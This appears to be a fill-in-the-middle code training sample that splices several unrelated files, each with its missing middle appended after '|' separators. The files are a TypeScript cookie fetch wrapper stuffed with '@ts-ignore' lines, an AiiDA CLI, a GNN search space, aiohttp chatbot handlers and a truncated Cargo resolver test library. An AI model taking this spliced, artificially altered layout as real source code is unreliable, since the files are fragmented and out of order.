const userAgentRe = /^User-Agent$/i;
// @ts-ignore
// @ts-ignore
const redirectCodes = new Set([303, 301, 302]);
// @ts-ignore
// @ts-ignore
const findUserAgent = (headers?: Headers): string | undefined => {
// @ts-ignore
if (!headers) {
// @ts-ignore
return undefined;
// @ts-ignore
}
// @ts-ignore
// @ts-ignore
const key = Object.keys(headers)
// @ts-ignore
.find((header): boolean => userAgentRe.test(header));
// @ts-ignore
// @ts-ignore
if (!key) {
// @ts-ignore
return undefined;
// @ts-ignore
}
// @ts-ignore
// @ts-ignore
return headers[key];
// @ts-ignore
};
// @ts-ignore
| export const fetchCookieDecorator = (jar = new CookieJar()): FetchWrapper => (
// @ts-ignore
async function fetchCookie(
// @ts-ignore
url: RequestInfo,
// @ts-ignore
options: RequestInit = {}
// @ts-ignore
): Promise<Response> {
// @ts-ignore
const previousCookie = await jar.getCookieString(String(url));
// @ts-ignore
// @ts-ignore
const { headers = {} } = options as {
// @ts-ignore
headers: Headers;
// @ts-ignore
};
// @ts-ignore
// @ts-ignore
if (previousCookie) {
// @ts-ignore
headers.cookie = previousCookie;
// @ts-ignore
}
// @ts-ignore
// @ts-ignore
debug('fetch url %s', url);
// @ts-ignore
// @ts-ignore
const response = await fetch(url, {
// @ts-ignore
...options,
// @ts-ignore
// @ts-ignore
headers
// @ts-ignore
});
// @ts-ignore
// @ts-ignore
const { 'set-cookie': cookies = [] } = response.headers.raw();
// @ts-ignore
// @ts-ignore
if (cookies.length === 0) {
// @ts-ignore
return response;
// @ts-ignore
}
// @ts-ignore
// @ts-ignore
await Promise.all(cookies.map((cookie: string): Promise<unknown> => (
// @ts-ignore
jar.setCookie(cookie, response.url)
// @ts-ignore
)));
// @ts-ignore
// @ts-ignore
return response;
// @ts-ignore
}
// @ts-ignore
);
// @ts-ignore
// @ts-ignore
export const fetchCookieFollowRedirectsDecorator = (jar?: CookieJar): FetchWrapper => {
// @ts-ignore
const fetchCookie = fetchCookieDecorator(jar);
// @ts-ignore
// @ts-ignore
return async function fetchCookieFollowRedirects(
// @ts-ignore
url: RequestInfo,
// @ts-ignore
options: RequestInit = {}
// @ts-ignore
): Promise<Response> {
// @ts-ignore
const response = await fetchCookie(url, {
// @ts-ignore
...options,
// @ts-ignore
// @ts-ignore
redirect: 'manual'
// @ts-ignore
});
// @ts-ignore
// @ts-ignore
const isRedirect = redirectCodes.has(response.status);
// @ts-ignore
// @ts-ignore
if (isRedirect && options.redirect !== 'manual' && options.follow !== 0) {
// @ts-ignore
const location = response.headers.get('location');
// @ts-ignore
// @ts-ignore
debug('Redirect to', location);
// @ts-ignore
// @ts-ignore
if (!location) {
// @ts-ignore
throw new Error('Location header missing');
// @ts-ignore
}
// @ts-ignore
// @ts-ignore
let follow;
// @ts-ignore
if (options.follow) {
// @ts-ignore
follow = options.follow - 1;
// @ts-ignore
}
// @ts-ignore
// @ts-ignore
const userAgent = findUserAgent(options.headers as Headers);
// @ts-ignore
// @ts-ignore
const headers: Headers = userAgent !== undefined
// @ts-ignore
// eslint-disable-next-line @typescript-eslint/naming-convention
// @ts-ignore
? { 'User-Agent': userAgent }
// @ts-ignore
: {};
// @ts-ignore
// @ts-ignore
const redirectResponse = await fetchCookieFollowRedirects(location, {
// @ts-ignore
method: 'GET',
// @ts-ignore
body: undefined,
// @ts-ignore
agent: options.agent,
// @ts-ignore
headers,
// @ts-ignore
follow
// @ts-ignore
});
// @ts-ignore
// @ts-ignore
return redirectResponse;
// @ts-ignore
}
// @ts-ignore
// @ts-ignore
return response;
// @ts-ignore
};
// @ts-ignore
}; | // @ts-ignore |
cli.py | """
Command line interface (cli) for aiida_abinit.
Register new commands either via the "console_scripts" entry point or plug them
directly into the 'verdi' command by using AiiDA-specific entry points like
"aiida.cmdline.data" (both in the setup.json file).
"""
import sys
import click
from aiida.cmdline.utils import decorators
from aiida.cmdline.commands.cmd_data import verdi_data
from aiida.cmdline.params.types import DataParamType
# See aiida.cmdline.data entry point in setup.json
@verdi_data.group('abinit')
def data_cli():
|
@data_cli.command('list')
@decorators.with_dbenv()
def list_(): # pylint: disable=redefined-builtin
"""
Display all DiffParameters nodes
"""
from aiida.orm import QueryBuilder
from aiida.plugins import DataFactory
DiffParameters = DataFactory('abinit')
qb = QueryBuilder()
qb.append(DiffParameters)
results = qb.all()
s = ""
for result in results:
obj = result[0]
s += "{}, pk: {}\n".format(str(obj), obj.pk)
sys.stdout.write(s)
@data_cli.command('export')
@click.argument('node', metavar='IDENTIFIER', type=DataParamType())
@click.option('--outfile',
'-o',
type=click.Path(dir_okay=False),
help='Write output to file (default: print to stdout).')
@decorators.with_dbenv()
def export(node, outfile):
"""Export a DiffParameters node (identified by PK, UUID or label) to plain text."""
string = str(node)
if outfile:
with open(outfile, 'w') as f:
f.write(string)
else:
click.echo(string)
| """Command line interface for aiida-abinit""" |
message.py | # This is free and unencumbered software released into the public domain.
class Message:
"""A message."""
def __init__(self, id=None):
self.id = id
def __repr__(self):
"""Returns a human-readable string representation of this object."""
return "message{{id={}}}".format(self.id)
def | (self):
"""Returns a human-readable string representation of this object."""
return self.__repr__()
| __str__ |
micro_search_space.py | import torch
import torch.nn.functional as F
from torch.nn import Module
from torch_geometric.nn.conv import *
gnn_list = [
"gat_8", # GAT with 8 heads
"gat_6", # GAT with 6 heads
"gat_4", # GAT with 4 heads
"gat_2", # GAT with 2 heads
"gat_1", # GAT with 1 heads
"gcn", # GCN
"cheb", # chebnet
"sage", # sage
"arma",
"sg", # simplifying gcn
"linear", # skip connection
"zero", # skip connection
]
act_list = [
# "sigmoid", "tanh", "relu", "linear",
# "softplus", "leaky_relu", "relu6", "elu"
"sigmoid", "tanh", "relu", "linear", "elu"
]
def act_map(act):
if act == "linear":
return lambda x: x
elif act == "elu":
return F.elu
elif act == "sigmoid":
return torch.sigmoid
elif act == "tanh":
return torch.tanh
elif act == "relu":
return torch.nn.functional.relu
elif act == "relu6":
return torch.nn.functional.relu6
elif act == "softplus":
return torch.nn.functional.softplus
elif act == "leaky_relu":
return torch.nn.functional.leaky_relu
else:
raise Exception("wrong activate function")
def gnn_map(gnn_name, in_dim, out_dim, concat=False, bias=True) -> Module:
'''
:param gnn_name:
:param in_dim:
:param out_dim:
:param concat: for gat, concat multi-head output or not
:return: GNN model
'''
if gnn_name == "gat_8":
return GATConv(in_dim, out_dim, 8, concat=concat, bias=bias)
elif gnn_name == "gat_6":
return GATConv(in_dim, out_dim, 6, concat=concat, bias=bias)
elif gnn_name == "gat_4":
return GATConv(in_dim, out_dim, 4, concat=concat, bias=bias)
elif gnn_name == "gat_2":
return GATConv(in_dim, out_dim, 2, concat=concat, bias=bias)
elif gnn_name in ["gat_1", "gat"]:
return GATConv(in_dim, out_dim, 1, concat=concat, bias=bias)
elif gnn_name == "gcn":
return GCNConv(in_dim, out_dim)
elif gnn_name == "cheb":
return ChebConv(in_dim, out_dim, K=2, bias=bias)
elif gnn_name == "sage":
return SAGEConv(in_dim, out_dim, bias=bias)
elif gnn_name == "gated":
return GatedGraphConv(in_dim, out_dim, bias=bias)
elif gnn_name == "arma":
return ARMAConv(in_dim, out_dim, bias=bias)
elif gnn_name == "sg":
return SGConv(in_dim, out_dim, bias=bias)
elif gnn_name == "linear":
return LinearConv(in_dim, out_dim, bias=bias)
elif gnn_name == "zero":
return ZeroConv(in_dim, out_dim, bias=bias)
class LinearConv(Module):
def __init__(self,
in_channels,
out_channels,
bias=True):
super(LinearConv, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.linear = torch.nn.Linear(in_channels, out_channels, bias)
def forward(self, x, edge_index, edge_weight=None):
return self.linear(x)
def __repr__(self):
return '{}({}, {})'.format(self.__class__.__name__, self.in_channels,
self.out_channels)
class ZeroConv(Module):
def | (self,
in_channels,
out_channels,
bias=True):
super(ZeroConv, self).__init__()
self.out_dim = out_channels
def forward(self, x, edge_index, edge_weight=None):
return torch.zeros([x.size(0), self.out_dim]).to(x.device)
def __repr__(self):
return '{}({}, {})'.format(self.__class__.__name__, self.in_channels,
self.out_channels)
class SearchSpace(object):
def __init__(self, search_space=None):
if search_space:
self.search_space = search_space
else:
self.search_space = {}
self.search_space["act"] = act_list # activate function
self.search_space["gnn"] = gnn_list # gnn type
# 0 means history, 1 means current,
# each layer contains two input
self.search_space["self_index"] = [0, 1]
# same as self_index,
self.search_space["concat_type"] = ["add",
"product",
"concat"]
self.search_space['learning_rate'] = [1e-2, 1e-3, 1e-4, 5e-3, 5e-4]
self.search_space['dropout'] = [0.0, 0.1, 0.2, 0.3, 0.4,
0.5, 0.6, 0.7, 0.8, 0.9]
self.search_space['weight_decay'] = [0, 1e-3, 1e-4,
1e-5, 5e-5, 5e-4]
self.search_space['hidden_unit'] = [8, 16, 32, 64, 128, 256, 512]
pass
def get_search_space(self):
return self.search_space
@staticmethod
def generate_action_list(cell=4):
action_list = []
for i in range(cell):
action_list += ["self_index", "gnn"]
action_list += ["act", "concat_type"]
return action_list
class IncrementSearchSpace(object):
def __init__(self, search_space=None, max_cell=10):
if search_space:
self.search_space = search_space
else:
self.search_space = {}
self.search_space["act"] = act_list # activate function
self.search_space["gnn"] = gnn_list # gnn type
for i in range(max_cell):
self.search_space[f"self_index_{i}"] = list(range(2 + i))
# 0 means history, 1 means current,
# each layer contains two input
self.search_space["concat_type"] = ["add",
"product",
"concat"]
# same as self_index,
self.search_space['learning_rate'] = [1e-2, 1e-3, 1e-4, 5e-3, 5e-4]
self.search_space['dropout'] = [0.0, 0.1, 0.2, 0.3, 0.4,
0.5, 0.6, 0.7, 0.8, 0.9]
self.search_space['weight_decay'] = [0, 1e-3, 1e-4,
1e-5, 5e-5, 5e-4]
self.search_space['hidden_unit'] = [8, 16, 32, 64, 128, 256, 512]
pass
def get_search_space(self):
return self.search_space
@staticmethod
def generate_action_list(cell=4):
action_list = []
for i in range(cell):
action_list += [f"self_index_{i}", "gnn"]
action_list += ["act", "concat_type"]
return action_list
if __name__ == "__main__":
obj = IncrementSearchSpace()
print(obj.generate_action_list())
print(obj.get_search_space())
| __init__ |
handlers.py | import asyncio
from datetime import datetime
from string import hexdigits
from time import time
import aiohttp
import aiohttp_jinja2
from aiohttp import web
async def handle_command(payload, user_id, state_manager):
if payload in {'/start', '/close'} and state_manager:
await state_manager.drop_active_dialog(user_id)
return True
class ApiHandler:
def __init__(self, output_formatter, response_time_limit=5):
self.output_formatter = output_formatter
self.response_time_limit = response_time_limit
async def handle_api_request(self, request):
response = {}
register_msg = request.app['agent'].register_msg
if request.method == 'POST':
if 'content-type' not in request.headers \
or not request.headers['content-type'].startswith('application/json'):
raise web.HTTPBadRequest(reason='Content-Type should be application/json')
data = await request.json()
user_id = data.pop('user_id')
payload = data.pop('payload', '')
deadline_timestamp = None
if self.response_time_limit:
deadline_timestamp = time() + self.response_time_limit
if not user_id:
raise web.HTTPBadRequest(reason='user_id key is required')
command_performed = await handle_command(payload, user_id, request.app['agent'].state_manager)
if command_performed:
return web.json_response({})
response = await asyncio.shield(
register_msg(utterance=payload, user_external_id=user_id,
user_device_type=data.pop('user_device_type', 'http'),
date_time=datetime.now(),
location=data.pop('location', ''),
channel_type='http_client',
message_attrs=data, require_response=True,
deadline_timestamp=deadline_timestamp)
)
if response is None:
raise RuntimeError('Got None instead of a bot response.')
return web.json_response(self.output_formatter(response['dialog'].to_dict()))
async def dialog(self, request):
state_manager = request.app['agent'].state_manager
dialog_id = request.match_info['dialog_id']
if len(dialog_id) == 24 and all(c in hexdigits for c in dialog_id):
dialog_obj = await state_manager.get_dialog_by_id(dialog_id)
if not dialog_obj:
raise web.HTTPNotFound(reason=f'dialog with id {dialog_id} does not exist')
return web.json_response(dialog_obj.to_dict())
raise web.HTTPBadRequest(reason='dialog id should be 24-character hex string')
async def dialogs_by_user(self, request):
state_manager = request.app['agent'].state_manager
user_external_id = request.match_info['user_external_id']
dialogs = await state_manager.get_dialogs_by_user_ext_id(user_external_id)
return web.json_response([i.to_dict() for i in dialogs])
async def dialog_rating(self, request):
state_manager = request.app['agent'].state_manager
data = await request.json()
dialog_id = data.pop('dialog_id')
user_id = data.pop('user_id', None)
rating = data.pop('rating')
await state_manager.set_rating_dialog(user_id, dialog_id, rating)
return web.Response()
async def utterance_rating(self, request):
state_manager = request.app['agent'].state_manager
data = await request.json()
user_id = data.pop('user_id', None)
rating = data.pop('rating')
utt_id = data.pop('utt_id')
await state_manager.set_rating_utterance(user_id, utt_id, rating)
return web.Response()
async def options(self, request):
return web.Response(headers={'Access-Control-Allow-Methods': 'POST, OPTIONS'})
class PagesHandler:
def __init__(self, debug=False):
self.debug = debug
async def ping(self, request):
return web.json_response("pong")
async def options(self, request):
return web.Response(headers={'Access-Control-Allow-Methods': 'GET, OPTIONS'})
class WSstatsHandler:
def __init__(self):
self.update_time = 0.5
@aiohttp_jinja2.template('services_ws_highcharts.html')
async def ws_page(self, request):
return {}
async def ws_handler(self, request):
ws = web.WebSocketResponse()
await ws.prepare(request)
request.app['websockets'].append(ws)
logger_stats = request.app['logger_stats']
while True:
data = dict(logger_stats.get_current_load())
await ws.send_json(data)
await asyncio.sleep(self.update_time)
return ws
async def options(self, request):
return web.Response(headers={'Access-Control-Allow-Methods': 'GET, OPTIONS'})
class WSChatHandler:
def __init__(self, output_formatter):
self.output_formatter = output_formatter
@aiohttp_jinja2.template('chat.html')
async def ws_page(self, request):
return {}
async def ws_handler(self, request):
register_msg = request.app['agent'].register_msg
ws = web.WebSocketResponse()
await ws.prepare(request)
while True:
msg = await ws.receive()
if msg.type == aiohttp.WSMsgType.text:
data = msg.json()
user_id = data.pop('user_id')
payload = data.pop('payload', '')
deadline_timestamp = None
if not user_id:
raise web.HTTPBadRequest(reason='user_id key is required')
command_performed = await handle_command(payload, user_id, request.app['agent'].state_manager)
if command_performed:
|
response = await register_msg(
utterance=payload, user_external_id=user_id,
user_device_type=data.pop('user_device_type', 'websocket'),
date_time=datetime.now(),
location=data.pop('location', ''),
channel_type='ws_client',
message_attrs=data, require_response=True,
deadline_timestamp=deadline_timestamp
)
if response is None:
raise RuntimeError('Got None instead of a bot response.')
await ws.send_json(self.output_formatter(response['dialog'].to_dict()))
else:
await ws.close()
break
return ws
async def options(self, request):
return web.Response(headers={'Access-Control-Allow-Methods': 'GET, OPTIONS'})
| await ws.send_json('command_performed')
continue |
lib.rs | #![allow(clippy::many_single_char_names)]
#![allow(clippy::needless_range_loop)] // false positives
use std::cell::RefCell;
use std::cmp::PartialEq;
use std::cmp::{max, min};
use std::collections::{BTreeMap, BTreeSet, HashMap, HashSet};
use std::fmt;
use std::fmt::Write;
use std::rc::Rc;
use std::time::Instant;
use cargo::core::dependency::Kind;
use cargo::core::resolver::{self, ResolveOpts};
use cargo::core::source::{GitReference, SourceId};
use cargo::core::Resolve;
use cargo::core::{Dependency, PackageId, Registry, Summary};
use cargo::util::{CargoResult, Config, Graph, IntoUrl};
use proptest::collection::{btree_map, vec};
use proptest::prelude::*;
use proptest::sample::Index;
use proptest::string::string_regex;
use varisat::{self, ExtendFormula};
pub fn resolve(deps: Vec<Dependency>, registry: &[Summary]) -> CargoResult<Vec<PackageId>> {
resolve_with_config(deps, registry, None)
}
pub fn resolve_and_validated(
deps: Vec<Dependency>,
registry: &[Summary],
sat_resolve: Option<SatResolve>,
) -> CargoResult<Vec<PackageId>> {
let resolve = resolve_with_config_raw(deps.clone(), registry, None);
match resolve {
Err(e) => {
let sat_resolve = sat_resolve.unwrap_or_else(|| SatResolve::new(registry));
if sat_resolve.sat_resolve(&deps) {
panic!(
"the resolve err but the sat_resolve thinks this will work:\n{}",
sat_resolve.use_packages().unwrap()
);
}
Err(e)
}
Ok(resolve) => {
let mut stack = vec![pkg_id("root")];
let mut used = HashSet::new();
let mut links = HashSet::new();
while let Some(p) = stack.pop() {
assert!(resolve.contains(&p));
if used.insert(p) {
// in the tests all `links` crates end in `-sys`
if p.name().ends_with("-sys") {
assert!(links.insert(p.name()));
}
stack.extend(resolve.deps(p).map(|(dp, deps)| {
for d in deps {
assert!(d.matches_id(dp));
}
dp
}));
}
}
let out = resolve.sort();
assert_eq!(out.len(), used.len());
let mut pub_deps: HashMap<PackageId, HashSet<_>> = HashMap::new();
for &p in out.iter() {
// make the list of `p` public dependencies
let mut self_pub_dep = HashSet::new();
self_pub_dep.insert(p);
for (dp, deps) in resolve.deps(p) {
if deps.iter().any(|d| d.is_public()) {
self_pub_dep.extend(pub_deps[&dp].iter().cloned())
}
}
pub_deps.insert(p, self_pub_dep);
// check if `p` has a public dependencies conflicts
let seen_dep: BTreeSet<_> = resolve
.deps(p)
.flat_map(|(dp, _)| pub_deps[&dp].iter().cloned())
.collect();
let seen_dep: Vec<_> = seen_dep.iter().collect();
for a in seen_dep.windows(2) {
if a[0].name() == a[1].name() {
panic!(
"the package {:?} can publicly see {:?} and {:?}",
p, a[0], a[1]
)
}
}
}
let sat_resolve = sat_resolve.unwrap_or_else(|| SatResolve::new(registry));
if !sat_resolve.sat_is_valid_solution(&out) {
panic!(
"the sat_resolve err but the resolve thinks this will work:\n{:?}",
resolve
);
}
Ok(out)
}
}
}
pub fn resolve_with_config(
deps: Vec<Dependency>,
registry: &[Summary],
config: Option<&Config>,
) -> CargoResult<Vec<PackageId>> {
let resolve = resolve_with_config_raw(deps, registry, config)?;
Ok(resolve.sort())
}
pub fn resolve_with_config_raw(
deps: Vec<Dependency>,
registry: &[Summary],
config: Option<&Config>,
) -> CargoResult<Resolve> {
struct MyRegistry<'a> {
list: &'a [Summary],
used: HashSet<PackageId>,
};
impl<'a> Registry for MyRegistry<'a> {
fn query(
&mut self,
dep: &Dependency,
f: &mut dyn FnMut(Summary),
fuzzy: bool,
) -> CargoResult<()> {
for summary in self.list.iter() {
if fuzzy || dep.matches(summary) {
self.used.insert(summary.package_id());
f(summary.clone());
}
}
Ok(())
}
fn describe_source(&self, _src: SourceId) -> String {
String::new()
}
fn is_replaced(&self, _src: SourceId) -> bool {
false
}
}
impl<'a> Drop for MyRegistry<'a> {
fn drop(&mut self) {
if std::thread::panicking() && self.list.len() != self.used.len() {
// we found a case that causes a panic and did not use all of the input.
// lets print the part of the input that was used for minimization.
println!(
"{:?}",
PrettyPrintRegistry(
self.list
.iter()
.filter(|s| { self.used.contains(&s.package_id()) })
.cloned()
.collect()
)
);
}
}
}
let mut registry = MyRegistry {
list: registry,
used: HashSet::new(),
};
let summary = Summary::new(
pkg_id("root"),
deps,
&BTreeMap::<String, Vec<String>>::new(),
None::<&String>,
false,
)
.unwrap();
let opts = ResolveOpts::everything();
let start = Instant::now();
let resolve = resolver::resolve(
&[(summary, opts)],
&[],
&mut registry,
&HashSet::new(),
config,
true,
);
// The largest test in our suite takes less then 30 sec.
// So lets fail the test if we have ben running for two long.
assert!(start.elapsed().as_secs() < 60);
resolve
}
const fn num_bits<T>() -> usize {
std::mem::size_of::<T>() * 8
}
fn log_bits(x: usize) -> usize {
if x == 0 {
return 0;
}
assert!(x > 0);
(num_bits::<usize>() as u32 - x.leading_zeros()) as usize
}
fn sat_at_most_one(solver: &mut impl varisat::ExtendFormula, vars: &[varisat::Var]) {
if vars.len() <= 1 {
return;
} else if vars.len() == 2 {
solver.add_clause(&[vars[0].negative(), vars[1].negative()]);
return;
} else if vars.len() == 3 {
solver.add_clause(&[vars[0].negative(), vars[1].negative()]);
solver.add_clause(&[vars[0].negative(), vars[2].negative()]);
solver.add_clause(&[vars[1].negative(), vars[2].negative()]);
return;
}
// use the "Binary Encoding" from
// https://www.it.uu.se/research/group/astra/ModRef10/papers/Alan%20M.%20Frisch%20and%20Paul%20A.%20Giannoros.%20SAT%20Encodings%20of%20the%20At-Most-k%20Constraint%20-%20ModRef%202010.pdf
let bits: Vec<varisat::Var> = solver.new_var_iter(log_bits(vars.len())).collect();
for (i, p) in vars.iter().enumerate() {
for b in 0..bits.len() {
solver.add_clause(&[p.negative(), bits[b].lit(((1 << b) & i) > 0)]);
}
}
}
fn sat_at_most_one_by_key<K: std::hash::Hash + Eq>(
cnf: &mut impl varisat::ExtendFormula,
data: impl Iterator<Item = (K, varisat::Var)>,
) -> HashMap<K, Vec<varisat::Var>> {
// no two packages with the same links set
let mut by_keys: HashMap<K, Vec<varisat::Var>> = HashMap::new();
for (p, v) in data {
by_keys.entry(p).or_default().push(v)
}
for key in by_keys.values() {
sat_at_most_one(cnf, key);
}
by_keys
}
/// Resolution can be reduced to the SAT problem. So this is an alternative implementation
/// of the resolver that uses a SAT library for the hard work. This is intended to be easy to read,
/// as compared to the real resolver.
///
/// For the subset of functionality that are currently made by `registry_strategy` this will,
/// find a valid resolution if one exists. The big thing that the real resolver does,
/// that this one does not do is work with features and optional dependencies.
///
/// The SAT library dose not optimize for the newer version,
/// so the selected packages may not match the real resolver.
#[derive(Clone)]
pub struct SatResolve(Rc<RefCell<SatResolveInner>>);
struct SatResolveInner {
solver: varisat::Solver<'static>,
var_for_is_packages_used: HashMap<PackageId, varisat::Var>,
by_name: HashMap<&'static str, Vec<PackageId>>,
}
impl SatResolve {
pub fn new(registry: &[Summary]) -> Self {
let mut cnf = varisat::CnfFormula::new();
let var_for_is_packages_used: HashMap<PackageId, varisat::Var> = registry
.iter()
.map(|s| (s.package_id(), cnf.new_var()))
.collect();
// no two packages with the same links set
sat_at_most_one_by_key(
&mut cnf,
registry
.iter()
.map(|s| (s.links(), var_for_is_packages_used[&s.package_id()]))
.filter(|(l, _)| l.is_some()),
);
// no two semver compatible versions of the same package
let by_activations_keys = sat_at_most_one_by_key(
&mut cnf,
var_for_is_packages_used
.iter()
.map(|(p, &v)| (p.as_activations_key(), v)),
);
let mut by_name: HashMap<&'static str, Vec<PackageId>> = HashMap::new();
for p in registry.iter() {
by_name
.entry(p.name().as_str())
.or_default()
.push(p.package_id())
}
let empty_vec = vec![];
let mut graph: Graph<PackageId, ()> = Graph::new();
let mut version_selected_for: HashMap<
PackageId,
HashMap<Dependency, HashMap<_, varisat::Var>>,
> = HashMap::new();
// active packages need each of there `deps` to be satisfied
for p in registry.iter() {
graph.add(p.package_id());
for dep in p.dependencies() {
// This can more easily be written as:
// !is_active(p) or one of the things that match dep is_active
// All the complexity, from here to the end, is to support public and private dependencies!
let mut by_key: HashMap<_, Vec<varisat::Lit>> = HashMap::new();
for &m in by_name
.get(dep.package_name().as_str())
.unwrap_or(&empty_vec)
.iter()
.filter(|&p| dep.matches_id(*p))
{
graph.link(p.package_id(), m);
by_key
.entry(m.as_activations_key())
.or_default()
.push(var_for_is_packages_used[&m].positive());
}
let keys: HashMap<_, _> = by_key.keys().map(|&k| (k, cnf.new_var())).collect();
// if `p` is active then we need to select one of the keys
let matches: Vec<_> = keys
.values()
.map(|v| v.positive())
.chain(Some(var_for_is_packages_used[&p.package_id()].negative()))
.collect();
cnf.add_clause(&matches);
// if a key is active then we need to select one of the versions
for (key, vars) in by_key.iter() {
let mut matches = vars.clone();
matches.push(keys[key].negative());
cnf.add_clause(&matches);
}
version_selected_for
.entry(p.package_id())
.or_default()
.insert(dep.clone(), keys);
}
}
let topological_order = graph.sort();
// we already ensure there is only one version for each `activations_key` so we can think of
// `publicly_exports` as being in terms of a set of `activations_key`s
let mut publicly_exports: HashMap<_, HashMap<_, varisat::Var>> = HashMap::new();
for &key in by_activations_keys.keys() {
// everything publicly depends on itself
let var = publicly_exports
.entry(key)
.or_default()
.entry(key)
.or_insert_with(|| cnf.new_var());
cnf.add_clause(&[var.positive()]);
}
// if a `dep` is public then `p` `publicly_exports` all the things that the selected version `publicly_exports`
for &p in topological_order.iter() {
if let Some(deps) = version_selected_for.get(&p) {
let mut p_exports = publicly_exports.remove(&p.as_activations_key()).unwrap();
for (_, versions) in deps.iter().filter(|(d, _)| d.is_public()) {
for (ver, sel) in versions {
for (&export_pid, &export_var) in publicly_exports[ver].iter() {
let our_var =
p_exports.entry(export_pid).or_insert_with(|| cnf.new_var());
cnf.add_clause(&[
sel.negative(),
export_var.negative(),
our_var.positive(),
]);
}
}
}
publicly_exports.insert(p.as_activations_key(), p_exports);
}
}
// we already ensure there is only one version for each `activations_key` so we can think of
// `can_see` as being in terms of a set of `activations_key`s
// and if `p` `publicly_exports` `export` then it `can_see` `export`
let mut can_see: HashMap<_, HashMap<_, varisat::Var>> = HashMap::new();
// if `p` has a `dep` that selected `ver` then it `can_see` all the things that the selected version `publicly_exports`
for (&p, deps) in version_selected_for.iter() {
let p_can_see = can_see.entry(p).or_default();
for (_, versions) in deps.iter() {
for (&ver, sel) in versions {
for (&export_pid, &export_var) in publicly_exports[&ver].iter() {
let our_var = p_can_see.entry(export_pid).or_insert_with(|| cnf.new_var());
cnf.add_clause(&[
sel.negative(),
export_var.negative(),
our_var.positive(),
]);
}
}
}
}
// a package `can_see` only one version by each name
for (_, see) in can_see.iter() {
sat_at_most_one_by_key(&mut cnf, see.iter().map(|((name, _, _), &v)| (name, v)));
}
let mut solver = varisat::Solver::new();
solver.add_formula(&cnf);
// We dont need to `solve` now. We know that "use nothing" will satisfy all the clauses so far.
// But things run faster if we let it spend some time figuring out how the constraints interact before we add assumptions.
solver
.solve()
.expect("docs say it can't error in default config");
SatResolve(Rc::new(RefCell::new(SatResolveInner {
solver,
var_for_is_packages_used,
by_name,
})))
}
pub fn sat_resolve(&self, deps: &[Dependency]) -> bool {
let mut s = self.0.borrow_mut();
let mut assumption = vec![];
let mut this_call = None;
// the starting `deps` need to be satisfied
for dep in deps.iter() {
let empty_vec = vec![];
let matches: Vec<varisat::Lit> = s
.by_name
.get(dep.package_name().as_str())
.unwrap_or(&empty_vec)
.iter()
.filter(|&p| dep.matches_id(*p))
.map(|p| s.var_for_is_packages_used[p].positive())
.collect();
if matches.is_empty() {
return false;
} else if matches.len() == 1 {
assumption.extend_from_slice(&matches)
} else {
if this_call.is_none() {
let new_var = s.solver.new_var();
this_call = Some(new_var);
assumption.push(new_var.positive());
}
let mut matches = matches;
matches.push(this_call.unwrap().negative());
s.solver.add_clause(&matches);
}
}
s.solver.assume(&assumption);
s.solver
.solve()
.expect("docs say it can't error in default config")
}
pub fn sat_is_valid_solution(&self, pids: &[PackageId]) -> bool {
let mut s = self.0.borrow_mut();
for p in pids {
if p.name().as_str() != "root" && !s.var_for_is_packages_used.contains_key(p) {
return false;
}
}
let assumption: Vec<_> = s
.var_for_is_packages_used
.iter()
.map(|(p, v)| v.lit(pids.contains(p)))
.collect();
s.solver.assume(&assumption);
s.solver
.solve()
.expect("docs say it can't error in default config")
}
fn use_packages(&self) -> Option<String> {
self.0.borrow().solver.model().map(|lits| {
let lits: HashSet<_> = lits
.iter()
.filter(|l| l.is_positive())
.map(|l| l.var())
.collect();
let mut out = String::new();
out.push_str("used:\n");
for (p, v) in self.0.borrow().var_for_is_packages_used.iter() {
if lits.contains(v) {
writeln!(&mut out, " {}", p).unwrap();
}
}
out
})
}
}
pub trait ToDep {
fn to_dep(self) -> Dependency;
}
impl ToDep for &'static str {
fn to_dep(self) -> Dependency {
Dependency::parse_no_deprecated(self, Some("1.0.0"), registry_loc()).unwrap()
}
}
impl ToDep for Dependency {
fn to_dep(self) -> Dependency {
self
}
}
pub trait ToPkgId {
fn to_pkgid(&self) -> PackageId;
}
impl ToPkgId for PackageId {
fn to_pkgid(&self) -> PackageId {
*self
}
}
impl<'a> ToPkgId for &'a str {
fn to_pkgid(&self) -> PackageId {
PackageId::new(*self, "1.0.0", registry_loc()).unwrap()
}
}
impl<T: AsRef<str>, U: AsRef<str>> ToPkgId for (T, U) {
fn to_pkgid(&self) -> PackageId {
let (name, vers) = self;
PackageId::new(name.as_ref(), vers.as_ref(), registry_loc()).unwrap()
}
}
#[macro_export]
macro_rules! pkg {
($pkgid:expr => [$($deps:expr),+ $(,)* ]) => ({
let d: Vec<Dependency> = vec![$($deps.to_dep()),+];
$crate::pkg_dep($pkgid, d)
});
($pkgid:expr) => ({
$crate::pkg($pkgid)
})
}
fn registry_loc() -> SourceId {
lazy_static::lazy_static! {
static ref EXAMPLE_DOT_COM: SourceId =
SourceId::for_registry(&"https://example.com".into_url().unwrap()).unwrap();
}
*EXAMPLE_DOT_COM
}
pub fn pkg<T: ToPkgId>(name: T) -> Summary {
pkg_dep(name, Vec::new())
}
pub fn pkg_dep<T: ToPkgId>(name: T, dep: Vec<Dependency>) -> Summary {
let pkgid = name.to_pkgid();
let link = if pkgid.name().ends_with("-sys") {
Some(pkgid.name().as_str())
} else {
None
};
Summary::new(
name.to_pkgid(),
dep,
&BTreeMap::<String, Vec<String>>::new(),
link,
false,
)
.unwrap()
}
pub fn pkg_id(name: &str) -> PackageId {
PackageId::new(name, "1.0.0", registry_loc()).unwrap()
}
fn pkg_id_loc(name: &str, loc: &str) -> PackageId {
let remote = loc.into_url();
let master = GitReference::Branch("master".to_string());
let source_id = SourceId::for_git(&remote.unwrap(), master).unwrap();
PackageId::new(name, "1.0.0", source_id).unwrap()
}
pub fn pkg_loc(name: &str, loc: &str) -> Summary {
let link = if name.ends_with("-sys") {
Some(name)
} else {
None
};
Summary::new(
pkg_id_loc(name, loc),
Vec::new(),
&BTreeMap::<String, Vec<String>>::new(),
link,
false,
)
.unwrap()
}
pub fn remove_dep(sum: &Summary, ind: usize) -> Summary {
let mut deps = sum.dependencies().to_vec();
deps.remove(ind);
// note: more things will need to be copied over in the future, but it works for now.
Summary::new(
sum.package_id(),
deps,
&BTreeMap::<String, Vec<String>>::new(),
sum.links().map(|a| a.as_str()),
sum.namespaced_features(),
)
.unwrap()
}
pub fn dep(name: &str) -> Dependency {
dep_req(name, "*")
}
pub fn dep_req(name: &str, req: &str) -> Dependency {
Dependency::parse_no_deprecated(name, Some(req), registry_loc()).unwrap()
}
pub fn dep_req_kind(name: &str, req: &str, kind: Kind, public: bool) -> Dependency {
